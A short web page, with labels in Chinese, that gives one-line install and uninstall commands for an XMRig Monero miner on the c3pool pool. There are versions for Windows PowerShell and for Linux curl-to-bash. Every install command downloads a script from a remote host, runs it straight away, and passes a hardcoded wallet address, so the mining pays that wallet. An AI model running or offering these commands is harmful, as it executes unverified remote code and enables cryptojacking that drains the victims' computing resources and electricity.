Windows安装脚本
复制内容
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://xmr.vmos.eu.org/xmrig_setup/raw/master/setup_c3pool_miner.bat', $tempfile); & $tempfile 4DSQMNzzq46N1z2pZWAVdeA6JvUL9TCB2bnBiA3ZzoqEdYJnMydt5akCa3vtmapeDsbVKGPFdNkzqTcJS8M8oyK7WGjw1Yoc6RJGR2BRhs; Remove-Item -Force $tempfile"
Windows卸载脚本
复制内容
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://xmr.vmos.eu.org/xmrig_setup/raw/master/uninstall_c3pool_miner.bat', $tempfile); & $tempfile; Remove-Item -Force $tempfile"
Linux安装脚本
复制内容
curl -s -L https://xmr.vmos.eu.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 4DSQMNzzq46N1z2pZWAVdeA6JvUL9TCB2bnBiA3ZzoqEdYJnMydt5akCa3vtmapeDsbVKGPFdNkzqTcJS8M8oyK7WGjw1Yoc6RJGR2BRhs
Linux卸载脚本
复制内容
curl -s -L https://xmr.vmos.eu.org/xmrig_setup/raw/master/uninstall_c3pool_miner.sh | bash -s
Windows
Linux